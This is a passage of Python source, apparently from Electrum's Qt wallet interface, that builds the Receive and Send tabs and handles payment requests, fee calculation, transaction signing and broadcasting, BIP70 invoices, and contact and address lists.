self.receive_amount_e.textChanged.connect(self.update_receive_qr)
self.fiat_receive_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_receive_e.setVisible(False)
grid.addWidget(self.fiat_receive_e, 2, 2, Qt.AlignLeft)
self.connect_fields(self, self.receive_amount_e, self.fiat_receive_e, None)
self.expires_combo = QComboBox()
self.expires_combo.addItems([i[0] for i in expiration_values])
self.expires_combo.setCurrentIndex(3)
self.expires_combo.setFixedWidth(self.receive_amount_e.width())
msg = ' '.join([
_('Expiration date of your request.'),
_('This information is seen by the recipient if you send them a signed payment request.'),
_('Expired requests have to be deleted manually from your list, in order to free the corresponding Bitcoin addresses.'),
_('The Bitcoin address never expires and will always be part of this Electrum wallet.'),
])
grid.addWidget(HelpLabel(_('Request expires'), msg), 3, 0)
grid.addWidget(self.expires_combo, 3, 1)
self.expires_label = QLineEdit('')
self.expires_label.setReadOnly(1)
self.expires_label.setFocusPolicy(Qt.NoFocus)
self.expires_label.hide()
grid.addWidget(self.expires_label, 3, 1)
self.save_request_button = QPushButton(_('Save'))
self.save_request_button.clicked.connect(self.save_payment_request)
self.new_request_button = QPushButton(_('New'))
self.new_request_button.clicked.connect(self.new_payment_request)
self.receive_qr = QRCodeWidget(fixedSize=200)
self.receive_qr.mouseReleaseEvent = lambda x: self.toggle_qr_window()
self.receive_qr.enterEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.PointingHandCursor))
self.receive_qr.leaveEvent = lambda x: self.app.setOverrideCursor(QCursor(Qt.ArrowCursor))
self.receive_buttons = buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.save_request_button)
buttons.addWidget(self.new_request_button)
grid.addLayout(buttons, 4, 1, 1, 2)
self.receive_requests_label = QLabel(_('Requests'))
from .request_list import RequestList
self.request_list = RequestList(self)
# layout
vbox_g = QVBoxLayout()
vbox_g.addLayout(grid)
vbox_g.addStretch()
hbox = QHBoxLayout()
hbox.addLayout(vbox_g)
hbox.addWidget(self.receive_qr)
w = QWidget()
w.searchable_list = self.request_list
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.receive_requests_label)
vbox.addWidget(self.request_list)
vbox.setStretchFactor(self.request_list, 1000)
return w
def delete_payment_request(self, addr):
self.wallet.remove_payment_request(addr, self.config)
self.request_list.update()
self.clear_receive_tab()
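# get_request_URI builds a BIP21 payment URI for a stored request and appends
# Electrum-specific query parameters: creation time, expiry, and, for signed
# requests, the requestor name plus a base58-encoded signature.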
def get_request_URI(self, addr):
req = self.wallet.receive_requests[addr]
message = self.wallet.labels.get(addr, '')
amount = req['amount']
URI = util.create_URI(addr, amount, message)
if req.get('time'):
URI += "&time=%d"%req.get('time')
if req.get('exp'):
URI += "&exp=%d"%req.get('exp')
if req.get('name') and req.get('sig'):
sig = bfh(req.get('sig'))
sig = bitcoin.base_encode(sig, base=58)
URI += "&name=" + req['name'] + "&sig="+sig
return str(URI)
def sign_payment_request(self, addr):
alias = self.config.get('alias')
alias_privkey = None
if alias and self.alias_info:
alias_addr, alias_name, validated = self.alias_info
if alias_addr:
if self.wallet.is_mine(alias_addr):
msg = _('This payment request will be signed.') + '\n' + _('Please enter your password')
password = None
if self.wallet.has_keystore_encryption():
password = self.password_dialog(msg)
if not password:
return
try:
self.wallet.sign_payment_request(addr, alias, alias_addr, password)
except Exception as e:
self.show_error(str(e))
return
else:
return
def save_payment_request(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
if not message and not amount:
self.show_error(_('No message or amount'))
return False
i = self.expires_combo.currentIndex()
expiration = list(map(lambda x: x[1], expiration_values))[i]
req = self.wallet.make_payment_request(addr, amount, message, expiration)
self.wallet.add_payment_request(req, self.config)
self.sign_payment_request(addr)
self.request_list.update()
self.address_list.update()
self.save_request_button.setEnabled(False)
def view_and_paste(self, title, msg, data):
dialog = WindowModalDialog(self, title)
vbox = QVBoxLayout()
label = QLabel(msg)
label.setWordWrap(True)
vbox.addWidget(label)
pr_e = ShowQRTextEdit(text=data)
vbox.addWidget(pr_e)
vbox.addLayout(Buttons(CopyCloseButton(pr_e.text, self.app, dialog)))
dialog.setLayout(vbox)
dialog.exec_()
def export_payment_request(self, addr):
r = self.wallet.receive_requests.get(addr)
pr = paymentrequest.serialize_request(r).SerializeToString()
name = r['id'] + '.bip70'
fileName = self.getSaveFileName(_("Select where to save your payment request"), name, "*.bip70")
if fileName:
with open(fileName, "wb+") as f:
f.write(util.to_bytes(pr))
self.show_message(_("Request saved successfully"))
self.saved = True
def new_payment_request(self):
addr = self.wallet.get_unused_address()
if addr is None:
if not self.wallet.is_deterministic():
msg = [
_('No more addresses in your wallet.'),
_('You are using a non-deterministic wallet, which cannot create new addresses.'),
_('If you want to create new addresses, use a deterministic wallet instead.')
]
self.show_message(' '.join(msg))
return
if not self.question(_("Warning: The next address will not be recovered automatically if you restore your wallet from seed; you may need to add it manually.\n\nThis occurs because you have too many unused addresses in your wallet. To avoid this situation, use the existing addresses first.\n\nCreate anyway?")):
return
addr = self.wallet.create_new_address(False)
self.set_receive_address(addr)
self.expires_label.hide()
self.expires_combo.show()
self.new_request_button.setEnabled(False)
self.receive_message_e.setFocus(1)
def set_receive_address(self, addr):
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
def clear_receive_tab(self):
addr = self.wallet.get_receiving_address() or ''
self.receive_address_e.setText(addr)
self.receive_message_e.setText('')
self.receive_amount_e.setAmount(None)
self.expires_label.hide()
self.expires_combo.show()
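# toggle_qr_window lazily creates the detached QR window and remembers its
# geometry across hide/show cycles so it reappears where the user left it.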
def toggle_qr_window(self):
from . import qrwindow
if not self.qr_window:
self.qr_window = qrwindow.QR_Window(self)
self.qr_window.setVisible(True)
self.qr_window_geometry = self.qr_window.geometry()
else:
if not self.qr_window.isVisible():
self.qr_window.setVisible(True)
self.qr_window.setGeometry(self.qr_window_geometry)
else:
self.qr_window_geometry = self.qr_window.geometry()
self.qr_window.setVisible(False)
self.update_receive_qr()
def show_send_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.send_tab))
def show_receive_tab(self):
self.tabs.setCurrentIndex(self.tabs.indexOf(self.receive_tab))
def receive_at(self, addr):
if not bitcoin.is_address(addr):
return
self.show_receive_tab()
self.receive_address_e.setText(addr)
self.new_request_button.setEnabled(True)
def update_receive_qr(self):
addr = str(self.receive_address_e.text())
amount = self.receive_amount_e.get_amount()
message = self.receive_message_e.text()
self.save_request_button.setEnabled((amount is not None) or (message != ""))
uri = util.create_URI(addr, amount, message)
self.receive_qr.setData(uri)
if self.qr_window and self.qr_window.isVisible():
self.qr_window.set_content(addr, amount, message, uri)
def set_feerounding_text(self, num_satoshis_added):
self.feerounding_text = (_('Additional {} satoshis are going to be added.')
.format(num_satoshis_added))
def create_send_tab(self):
# A 4-column grid layout. All the stretch is in the last column.
# The exchange rate plugin adds a fiat widget in column 2
self.send_grid = grid = QGridLayout()
grid.setSpacing(8)
grid.setColumnStretch(3, 1)
from .paytoedit import PayToEdit
self.amount_e = BTCAmountEdit(self.get_decimal_point)
self.payto_e = PayToEdit(self)
msg = _('Recipient of the funds.') + '\n\n'\
+ _('You may enter a Bitcoin address, a label from your list of contacts (a list of completions will be proposed), or an alias (email-like address that forwards to a Bitcoin address)')
payto_label = HelpLabel(_('Pay to'), msg)
grid.addWidget(payto_label, 1, 0)
grid.addWidget(self.payto_e, 1, 1, 1, -1)
completer = QCompleter()
completer.setCaseSensitivity(False)
self.payto_e.setCompleter(completer)
completer.setModel(self.completions)
msg = _('Description of the transaction (not mandatory).') + '\n\n'\
+ _('The description is not sent to the recipient of the funds. It is stored in your wallet file, and displayed in the \'History\' tab.')
description_label = HelpLabel(_('Description'), msg)
grid.addWidget(description_label, 2, 0)
self.message_e = MyLineEdit()
grid.addWidget(self.message_e, 2, 1, 1, -1)
self.from_label = QLabel(_('From'))
grid.addWidget(self.from_label, 3, 0)
self.from_list = MyTreeWidget(self, self.from_list_menu, ['',''])
self.from_list.setHeaderHidden(True)
self.from_list.setMaximumHeight(80)
grid.addWidget(self.from_list, 3, 1, 1, -1)
self.set_pay_from([])
msg = _('Amount to be sent.') + '\n\n' \
+ _('The amount will be displayed in red if you do not have enough funds in your wallet.') + ' ' \
+ _('Note that if you have frozen some of your addresses, the available funds will be lower than your total balance.') + '\n\n' \
+ _('Keyboard shortcut: type "!" to send all your coins.')
amount_label = HelpLabel(_('Amount'), msg)
grid.addWidget(amount_label, 4, 0)
grid.addWidget(self.amount_e, 4, 1)
self.fiat_send_e = AmountEdit(self.fx.get_currency if self.fx else '')
if not self.fx or not self.fx.is_enabled():
self.fiat_send_e.setVisible(False)
grid.addWidget(self.fiat_send_e, 4, 2)
self.amount_e.frozen.connect(
lambda: self.fiat_send_e.setFrozen(self.amount_e.isReadOnly()))
self.max_button = EnterButton(_("Max"), self.spend_max)
self.max_button.setFixedWidth(140)
grid.addWidget(self.max_button, 4, 3)
hbox = QHBoxLayout()
hbox.addStretch(1)
grid.addLayout(hbox, 4, 4)
msg = _('Bitcoin transactions are in general not free. A transaction fee is paid by the sender of the funds.') + '\n\n'\
+ _('The amount of fee can be decided freely by the sender. However, transactions with low fees take more time to be processed.') + '\n\n'\
+ _('A suggested fee is automatically added to this field. You may override it. The suggested fee increases with the size of the transaction.')
self.fee_e_label = HelpLabel(_('Fee'), msg)
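# fee_cb runs when the fee slider moves: it persists either the dynamic target
# (depth_level / fee_level) or a static fee_per_kb, mirrors the selected rate
# into the sat/byte edit, and re-runs the fee calculation (or spend_max when
# "Max" is active).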
def fee_cb(dyn, pos, fee_rate):
if dyn:
if self.config.use_mempool_fees():
self.config.set_key('depth_level', pos, False)
else:
self.config.set_key('fee_level', pos, False)
else:
self.config.set_key('fee_per_kb', fee_rate, False)
if fee_rate:
self.feerate_e.setAmount(fee_rate // 1000)
else:
self.feerate_e.setAmount(None)
self.fee_e.setModified(False)
self.fee_slider.activate()
self.spend_max() if self.is_max else self.update_fee()
self.fee_slider = FeeSlider(self, self.config, fee_cb)
self.fee_slider.setFixedWidth(140)
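# The absolute fee edit and the fee-rate edit are mutually exclusive inputs:
# whichever one the user touched last stays "frozen" and the other is marked
# unmodified so do_update_fee() recomputes it. Blanking a field hands control
# back to automatic fee calculation; any manual edit deactivates the slider.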
def on_fee_or_feerate(edit_changed, editing_finished):
edit_other = self.feerate_e if edit_changed == self.fee_e else self.fee_e
if editing_finished:
if not edit_changed.get_amount():
# This is so that when the user blanks the fee and moves on,
# we go back to auto-calculate mode and put a fee back.
edit_changed.setModified(False)
else:
# edit_changed was edited just now, so make sure we will
# freeze the correct fee setting (this)
edit_other.setModified(False)
self.fee_slider.deactivate()
self.update_fee()
class TxSizeLabel(QLabel):
def setAmount(self, byte_size):
self.setText(('x %s bytes =' % byte_size) if byte_size else '')
self.size_e = TxSizeLabel()
self.size_e.setAlignment(Qt.AlignCenter)
self.size_e.setAmount(0)
self.size_e.setFixedWidth(140)
self.size_e.setStyleSheet(ColorScheme.DEFAULT.as_stylesheet())
self.feerate_e = FeerateEdit(lambda: 0)
self.feerate_e.setAmount(self.config.fee_per_byte())
self.feerate_e.textEdited.connect(partial(on_fee_or_feerate, self.feerate_e, False))
self.feerate_e.editingFinished.connect(partial(on_fee_or_feerate, self.feerate_e, True))
self.fee_e = BTCAmountEdit(self.get_decimal_point)
self.fee_e.textEdited.connect(partial(on_fee_or_feerate, self.fee_e, False))
self.fee_e.editingFinished.connect(partial(on_fee_or_feerate, self.fee_e, True))
def feerounding_onclick():
text = (self.feerounding_text + '\n\n' +
_('To somewhat protect your privacy, Electrum tries to create change with similar precision to other outputs.') + ' ' +
_('At most 100 satoshis might be lost due to this rounding.') + ' ' +
_("You can disable this setting in '{}'.").format(_('Preferences')) + '\n' +
_('Also, dust is not kept as change, but added to the fee.'))
QMessageBox.information(self, 'Fee rounding', text)
self.feerounding_icon = QPushButton(QIcon(':icons/info.png'), '')
self.feerounding_icon.setFixedWidth(20)
self.feerounding_icon.setFlat(True)
self.feerounding_icon.clicked.connect(feerounding_onclick)
self.feerounding_icon.setVisible(False)
self.connect_fields(self, self.amount_e, self.fiat_send_e, self.fee_e)
vbox_feelabel = QVBoxLayout()
vbox_feelabel.addWidget(self.fee_e_label)
vbox_feelabel.addStretch(1)
grid.addLayout(vbox_feelabel, 5, 0)
self.fee_adv_controls = QWidget()
hbox = QHBoxLayout(self.fee_adv_controls)
hbox.setContentsMargins(0, 0, 0, 0)
hbox.addWidget(self.feerate_e)
hbox.addWidget(self.size_e)
hbox.addWidget(self.fee_e)
hbox.addWidget(self.feerounding_icon, Qt.AlignLeft)
hbox.addStretch(1)
vbox_feecontrol = QVBoxLayout()
vbox_feecontrol.addWidget(self.fee_adv_controls)
vbox_feecontrol.addWidget(self.fee_slider)
grid.addLayout(vbox_feecontrol, 5, 1, 1, -1)
if not self.config.get('show_fee', False):
self.fee_adv_controls.setVisible(False)
self.preview_button = EnterButton(_("Preview"), self.do_preview)
self.preview_button.setToolTip(_('Display the details of your transaction before signing it.'))
self.send_button = EnterButton(_("Send"), self.do_send)
self.clear_button = EnterButton(_("Clear"), self.do_clear)
buttons = QHBoxLayout()
buttons.addStretch(1)
buttons.addWidget(self.clear_button)
buttons.addWidget(self.preview_button)
buttons.addWidget(self.send_button)
grid.addLayout(buttons, 6, 1, 1, 3)
self.amount_e.shortcut.connect(self.spend_max)
self.payto_e.textChanged.connect(self.update_fee)
self.amount_e.textEdited.connect(self.update_fee)
def reset_max(t):
self.is_max = False
self.max_button.setEnabled(not bool(t))
self.amount_e.textEdited.connect(reset_max)
self.fiat_send_e.textEdited.connect(reset_max)
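# entry_changed recolours the amount/fee/feerate fields: red when the wallet
# cannot cover the amount (with a status-bar warning that also mentions frozen
# funds), blue for values that were auto-filled rather than typed by the user,
# and the default colour otherwise.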
def entry_changed():
text = ""
amt_color = ColorScheme.DEFAULT
fee_color = ColorScheme.DEFAULT
feerate_color = ColorScheme.DEFAULT
if self.not_enough_funds:
amt_color, fee_color = ColorScheme.RED, ColorScheme.RED
feerate_color = ColorScheme.RED
text = _( "Not enough funds" )
c, u, x = self.wallet.get_frozen_balance()
if c+u+x:
text += ' (' + self.format_amount(c+u+x).strip() + ' ' + self.base_unit() + ' ' +_("are frozen") + ')'
# blue color denotes auto-filled values
elif self.fee_e.isModified():
feerate_color = ColorScheme.BLUE
elif self.feerate_e.isModified():
fee_color = ColorScheme.BLUE
elif self.amount_e.isModified():
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
else:
amt_color = ColorScheme.BLUE
fee_color = ColorScheme.BLUE
feerate_color = ColorScheme.BLUE
self.statusBar().showMessage(text)
self.amount_e.setStyleSheet(amt_color.as_stylesheet())
self.fee_e.setStyleSheet(fee_color.as_stylesheet())
self.feerate_e.setStyleSheet(feerate_color.as_stylesheet())
self.amount_e.textChanged.connect(entry_changed)
self.fee_e.textChanged.connect(entry_changed)
self.feerate_e.textChanged.connect(entry_changed)
self.invoices_label = QLabel(_('Invoices'))
from .invoice_list import InvoiceList
self.invoice_list = InvoiceList(self)
vbox0 = QVBoxLayout()
vbox0.addLayout(grid)
hbox = QHBoxLayout()
hbox.addLayout(vbox0)
w = QWidget()
vbox = QVBoxLayout(w)
vbox.addLayout(hbox)
vbox.addStretch(1)
vbox.addWidget(self.invoices_label)
vbox.addWidget(self.invoice_list)
vbox.setStretchFactor(self.invoice_list, 1000)
w.searchable_list = self.invoice_list
run_hook('create_send_tab', grid)
return w
def spend_max(self):
self.is_max = True
self.do_update_fee()
def update_fee(self):
self.require_fee_update = True
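# If the Pay To field cannot be parsed yet, fall back to a dummy wallet
# address so do_update_fee can still estimate the transaction size and fee.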
def get_payto_or_dummy(self):
r = self.payto_e.get_recipient()
if r:
return r
return (TYPE_ADDRESS, self.wallet.dummy_address())
def do_update_fee(self):
'''Recalculate the fee. If the fee was manually input, retain it, but
still build the TX to see if there are enough funds.
'''
freeze_fee = self.is_send_fee_frozen()
freeze_feerate = self.is_send_feerate_frozen()
amount = '!' if self.is_max else self.amount_e.get_amount()
if amount is None:
if not freeze_fee:
self.fee_e.setAmount(None)
self.not_enough_funds = False
self.statusBar().showMessage('')
else:
fee_estimator = self.get_send_fee_estimator()
outputs = self.payto_e.get_outputs(self.is_max)
if not outputs:
_type, addr = self.get_payto_or_dummy()
outputs = [(_type, addr, amount)]
is_sweep = bool(self.tx_external_keypairs)
make_tx = lambda fee_est: \
self.wallet.make_unsigned_transaction(
self.get_coins(), outputs, self.config,
fixed_fee=fee_est, is_sweep=is_sweep)
try:
tx = make_tx(fee_estimator)
self.not_enough_funds = False
except (NotEnoughFunds, NoDynamicFeeEstimates) as e:
if not freeze_fee:
self.fee_e.setAmount(None)
if not freeze_feerate:
self.feerate_e.setAmount(None)
self.feerounding_icon.setVisible(False)
if isinstance(e, NotEnoughFunds):
self.not_enough_funds = True
elif isinstance(e, NoDynamicFeeEstimates):
try:
tx = make_tx(0)
size = tx.estimated_size()
self.size_e.setAmount(size)
except BaseException:
pass
return
except BaseException:
traceback.print_exc(file=sys.stderr)
return
size = tx.estimated_size()
self.size_e.setAmount(size)
fee = tx.get_fee()
fee = None if self.not_enough_funds else fee
# Displayed fee/fee_rate values are set according to user input.
# Due to rounding or dropping dust in CoinChooser,
# actual fees often differ somewhat.
if freeze_feerate or self.fee_slider.is_active():
displayed_feerate = self.feerate_e.get_amount()
displayed_feerate = displayed_feerate // 1000 if displayed_feerate else 0
displayed_fee = displayed_feerate * size
self.fee_e.setAmount(displayed_fee)
else:
if freeze_fee:
displayed_fee = self.fee_e.get_amount()
else:
# fallback to actual fee if nothing is frozen
displayed_fee = fee
self.fee_e.setAmount(displayed_fee)
displayed_fee = displayed_fee if displayed_fee else 0
displayed_feerate = displayed_fee // size if displayed_fee is not None else None
self.feerate_e.setAmount(displayed_feerate)
# show/hide fee rounding icon
feerounding = (fee - displayed_fee) if fee else 0
self.set_feerounding_text(feerounding)
self.feerounding_icon.setToolTip(self.feerounding_text)
self.feerounding_icon.setVisible(bool(feerounding))
if self.is_max:
amount = tx.output_value()
self.amount_e.setAmount(amount)
def from_list_delete(self, item):
i = self.from_list.indexOfTopLevelItem(item)
self.pay_from.pop(i)
self.redraw_from_list()
self.update_fee()
def from_list_menu(self, position):
item = self.from_list.itemAt(position)
menu = QMenu()
menu.addAction(_("Remove"), lambda: self.from_list_delete(item))
menu.exec_(self.from_list.viewport().mapToGlobal(position))
def set_pay_from(self, coins):
self.pay_from = list(coins)
self.redraw_from_list()
def redraw_from_list(self):
self.from_list.clear()
self.from_label.setHidden(len(self.pay_from) == 0)
self.from_list.setHidden(len(self.pay_from) == 0)
def format(x):
h = x.get('prevout_hash')
return h[0:10] + '...' + h[-10:] + ":%d"%x.get('prevout_n') + u'\t' + "%s"%x.get('address')
for item in self.pay_from:
self.from_list.addTopLevelItem(QTreeWidgetItem( [format(item), self.format_amount(item['value']) ]))
def get_contact_payto(self, key):
_type, label = self.contacts.get(key)
return label + ' <' + key + '>' if _type == 'address' else key
def update_completions(self):
l = [self.get_contact_payto(key) for key in self.contacts.keys()]
self.completions.setStringList(l)
def protected(func):
'''Password request wrapper. The password is passed to the function
as the 'password' named argument. "None" indicates either an
unencrypted wallet, or the user cancelled the password request.
An empty input is passed as the empty string.'''
def request_password(self, *args, **kwargs):
parent = self.top_level_window()
password = None
while self.wallet.has_keystore_encryption():
password = self.password_dialog(parent=parent)
if password is None:
# User cancelled password input
return
try:
self.wallet.check_password(password)
break
except Exception as e:
self.show_error(str(e), parent=parent)
continue
kwargs['password'] = password
return func(self, *args, **kwargs)
return request_password
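# A fee (or fee rate) counts as "frozen" when the user typed it manually: the
# edit is visible, was modified, and still holds text or focus. Frozen values
# are kept as-is by do_update_fee() instead of being recalculated.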
def is_send_fee_frozen(self):
return self.fee_e.isVisible() and self.fee_e.isModified() \
and (self.fee_e.text() or self.fee_e.hasFocus())
def is_send_feerate_frozen(self):
return self.feerate_e.isVisible() and self.feerate_e.isModified() \
and (self.feerate_e.text() or self.feerate_e.hasFocus())
def get_send_fee_estimator(self):
if self.is_send_fee_frozen():
fee_estimator = self.fee_e.get_amount()
elif self.is_send_feerate_frozen():
amount = self.feerate_e.get_amount()
amount = 0 if amount is None else amount
fee_estimator = partial(
simple_config.SimpleConfig.estimate_fee_for_feerate, amount)
else:
fee_estimator = None
return fee_estimator
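# read_send_tab validates the Send tab inputs (payment request expiry, payto
# lines, alias verification, output addresses and amounts) and returns the
# tuple (outputs, fee_estimator, label, coins) used to build the transaction,
# or None if validation fails.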
def read_send_tab(self):
if self.payment_request and self.payment_request.has_expired():
self.show_error(_('Payment request has expired'))
return
label = self.message_e.text()
if self.payment_request:
outputs = self.payment_request.get_outputs()
else:
errors = self.payto_e.get_errors()
if errors:
self.show_warning(_("Invalid Lines found:") + "\n\n" + '\n'.join([ _("Line #") + str(x[0]+1) + ": " + x[1] for x in errors]))
return
outputs = self.payto_e.get_outputs(self.is_max)
if self.payto_e.is_alias and self.payto_e.validated is False:
alias = self.payto_e.toPlainText()
msg = _('WARNING: the alias "{}" could not be validated via an additional '
'security check, DNSSEC, and thus may not be correct.').format(alias) + '\n'
msg += _('Do you wish to continue?')
if not self.question(msg):
return
if not outputs:
self.show_error(_('No outputs'))
return
for _type, addr, amount in outputs:
if addr is None:
self.show_error(_('Bitcoin Address is None'))
return
if _type == TYPE_ADDRESS and not bitcoin.is_address(addr):
self.show_error(_('Invalid Bitcoin Address'))
return
if amount is None:
self.show_error(_('Invalid Amount'))
return
fee_estimator = self.get_send_fee_estimator()
coins = self.get_coins()
return outputs, fee_estimator, label, coins
def do_preview(self):
self.do_send(preview = True)
def do_send(self, preview = False):
if run_hook('abort_send', self):
return
r = self.read_send_tab()
if not r:
return
outputs, fee_estimator, tx_desc, coins = r
try:
is_sweep = bool(self.tx_external_keypairs)
tx = self.wallet.make_unsigned_transaction(
coins, outputs, self.config, fixed_fee=fee_estimator,
is_sweep=is_sweep)
except NotEnoughFunds:
self.show_message(_("Insufficient funds"))
return
except BaseException as e:
traceback.print_exc(file=sys.stdout)
self.show_message(str(e))
return
amount = tx.output_value() if self.is_max else sum(map(lambda x:x[2], outputs))
fee = tx.get_fee()
use_rbf = self.config.get('use_rbf', True)
if use_rbf:
tx.set_rbf(True)
if fee < self.wallet.relayfee() * tx.estimated_size() / 1000:
self.show_error(_("This transaction requires a higher fee, or it will not be propagated by the network"))
return
if preview:
self.show_transaction(tx, tx_desc)
return
if not self.network:
self.show_error(_("You can't broadcast a transaction without a live network connection."))
return
# confirmation dialog
msg = [
_("Amount to be sent") + ": " + self.format_amount_and_units(amount),
_("Mining fee") + ": " + self.format_amount_and_units(fee),
]
x_fee = run_hook('get_tx_extra_fee', self.wallet, tx)
if x_fee:
x_fee_address, x_fee_amount = x_fee
msg.append( _("Additional fees") + ": " + self.format_amount_and_units(x_fee_amount) )
confirm_rate = simple_config.FEERATE_WARNING_HIGH_FEE
if fee > confirm_rate * tx.estimated_size() / 1000:
msg.append(_('Warning') + ': ' + _("The fee for this transaction seems unusually high."))
if self.wallet.has_keystore_encryption():
msg.append("")
msg.append(_("Enter your password to proceed"))
password = self.password_dialog('\n'.join(msg))
if not password:
return
else:
msg.append(_('Proceed?'))
password = None
if not self.question('\n'.join(msg)):
return
def sign_done(success):
if success:
if not tx.is_complete():
self.show_transaction(tx)
self.do_clear()
else:
self.broadcast_transaction(tx, tx_desc)
self.sign_tx_with_password(tx, sign_done, password)
@protected
def sign_tx(self, tx, callback, password):
self.sign_tx_with_password(tx, callback, password)
def sign_tx_with_password(self, tx, callback, password):
'''Sign the transaction in a separate thread. When done, calls
the callback with a success code of True or False.
'''
def on_signed(result):
callback(True)
def on_failed(exc_info):
self.on_error(exc_info)
callback(False)
if self.tx_external_keypairs:
# can sign directly
task = partial(Transaction.sign, tx, self.tx_external_keypairs)
else:
# call hook to see if plugin needs gui interaction
run_hook('sign_tx', self, tx)
task = partial(self.wallet.sign_transaction, tx, password)
WaitingDialog(self, _('Signing transaction...'), task,
on_signed, on_failed)
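# Broadcasting runs in a worker thread via WaitingDialog. When a BIP70 payment
# request is being paid, the invoice is marked paid and a payment ACK with a
# refund address is sent back to the requestor; broadcast_done then reports
# the outcome in the GUI thread.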
def broadcast_transaction(self, tx, tx_desc):
def broadcast_thread():
# non-GUI thread
pr = self.payment_request
if pr and pr.has_expired():
self.payment_request = None
return False, _("Payment request has expired")
status, msg = self.network.broadcast(tx)
if pr and status is True:
self.invoices.set_paid(pr, tx.txid())
self.invoices.save()
self.payment_request = None
refund_address = self.wallet.get_receiving_addresses()[0]
ack_status, ack_msg = pr.send_ack(str(tx), refund_address)
if ack_status:
msg = ack_msg
return status, msg
# Capture current TL window; override might be removed on return
parent = self.top_level_window()
def broadcast_done(result):
# GUI thread
if result:
status, msg = result
if status:
if tx_desc is not None and tx.is_complete():
self.wallet.set_label(tx.txid(), tx_desc)
parent.show_message(_('Payment sent.') + '\n' + msg)
self.invoice_list.update()
self.do_clear()
else:
parent.show_error(msg)
WaitingDialog(self, _('Broadcasting transaction...'),
broadcast_thread, broadcast_done, self.on_error)
def query_choice(self, msg, choices):
# Needed by QtHandler for hardware wallets
dialog = WindowModalDialog(self.top_level_window())
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout(dialog)
vbox.addLayout(clayout.layout())
vbox.addLayout(Buttons(OkButton(dialog)))
if not dialog.exec_():
return None
return clayout.selected_index()
def lock_amount(self, b):
self.amount_e.setFrozen(b)
self.max_button.setEnabled(not b)
def prepare_for_payment_request(self):
self.show_send_tab()
self.payto_e.is_pr = True
for e in [self.payto_e, self.amount_e, self.message_e]:
e.setFrozen(True)
self.payto_e.setText(_("please wait..."))
return True
def delete_invoice(self, key):
self.invoices.remove(key)
self.invoice_list.update()
def payment_request_ok(self):
pr = self.payment_request
key = self.invoices.add(pr)
status = self.invoices.get_status(key)
self.invoice_list.update()
if status == PR_PAID:
self.show_message("invoice already paid")
self.do_clear()
self.payment_request = None
return
self.payto_e.is_pr = True
if not pr.has_expired():
self.payto_e.setGreen()
else:
self.payto_e.setExpired()
self.payto_e.setText(pr.get_requestor())
self.amount_e.setText(format_satoshis_plain(pr.get_amount(), self.decimal_point))
self.message_e.setText(pr.get_memo())
# signal to set fee
self.amount_e.textEdited.emit("")
def payment_request_error(self):
self.show_message(self.payment_request.error)
self.payment_request = None
self.do_clear()
def on_pr(self, request):
self.payment_request = request
if self.payment_request.verify(self.contacts):
self.payment_request_ok_signal.emit()
else:
self.payment_request_error_signal.emit()
def pay_to_URI(self, URI):
if not URI:
return
try:
out = util.parse_URI(URI, self.on_pr)
except BaseException as e:
self.show_error(_('Invalid bitcoin URI:') + '\n' + str(e))
return
self.show_send_tab()
r = out.get('r')
sig = out.get('sig')
name = out.get('name')
if r or (name and sig):
self.prepare_for_payment_request()
return
address = out.get('address')
amount = out.get('amount')
label = out.get('label')
message = out.get('message')
# use label as description (not BIP21 compliant)
if label and not message:
message = label
if address:
self.payto_e.setText(address)
if message:
self.message_e.setText(message)
if amount:
self.amount_e.setAmount(amount)
self.amount_e.textEdited.emit("")
def do_clear(self):
self.is_max = False
self.not_enough_funds = False
self.payment_request = None
self.payto_e.is_pr = False
for e in [self.payto_e, self.message_e, self.amount_e, self.fiat_send_e,
self.fee_e, self.feerate_e]:
e.setText('')
e.setFrozen(False)
self.fee_slider.activate()
self.feerate_e.setAmount(self.config.fee_per_byte())
self.size_e.setAmount(0)
self.feerounding_icon.setVisible(False)
self.set_pay_from([])
self.tx_external_keypairs = {}
self.update_status()
run_hook('do_clear', self)
def set_frozen_state(self, addrs, freeze):
self.wallet.set_frozen_state(addrs, freeze)
self.address_list.update()
self.utxo_list.update()
self.update_fee()
def create_list_tab(self, l, list_header=None):
w = QWidget()
w.searchable_list = l
vbox = QVBoxLayout()
w.setLayout(vbox)
vbox.setContentsMargins(0, 0, 0, 0)
vbox.setSpacing(0)
if list_header:
hbox = QHBoxLayout()
for b in list_header:
hbox.addWidget(b)
hbox.addStretch()
vbox.addLayout(hbox)
vbox.addWidget(l)
return w
def create_addresses_tab(self):
from .address_list import AddressList
self.address_list = l = AddressList(self)
return self.create_list_tab(l, l.get_list_header())
def create_utxo_tab(self):
from .utxo_list import UTXOList
self.utxo_list = l = UTXOList(self)
return self.create_list_tab(l)
def create_contacts_tab(self):
from .contact_list import ContactList
self.contact_list = l = ContactList(self)
return self.create_list_tab(l)
def remove_address(self, addr):
if self.question(_("Do you want to remove")+" %s "%addr +_("from your wallet?")):
self.wallet.delete_address(addr)
self.address_list.update()
self.history_list.update()
self.clear_receive_tab()
def get_coins(self):
if self.pay_from:
return self.pay_from
else:
return self.wallet.get_spendable_coins(None, self.config)
def spend_coins(self, coins):
self.set_pay_from(coins)
self.show_send_tab()
self.update_fee()
def paytomany(self):
self.show_send_tab()
self.payto_e.paytomany()
msg = '\n'.join([
_('Enter a list of outputs in the \'Pay to\' field.'),
_('One output per line.'),
_('Format: address, amount'),
_('You may load a CSV file using the file icon.')
])
self.show_message(msg, title=_('Pay to many'))
def payto_contacts(self, labels):
paytos = [self.get_contact_payto(label) for label in labels]
self.show_send_tab()
if len(paytos) == 1:
self.payto_e.setText(paytos[0])
self.amount_e.setFocus()
else:
text = "\n".join([payto + ", 0" for payto in paytos])
self.payto_e.setText(text)
self.payto_e.setFocus()
def set_contact(self, label, address):
if not is_address(address):
self.show_error(_('Invalid Address'))
self.contact_list.update() # Displays original unchanged value
return False
self.contacts[address] = ('address', label)
self.contact_list.update()
self.history_list.update()
self.update_completions()
return True
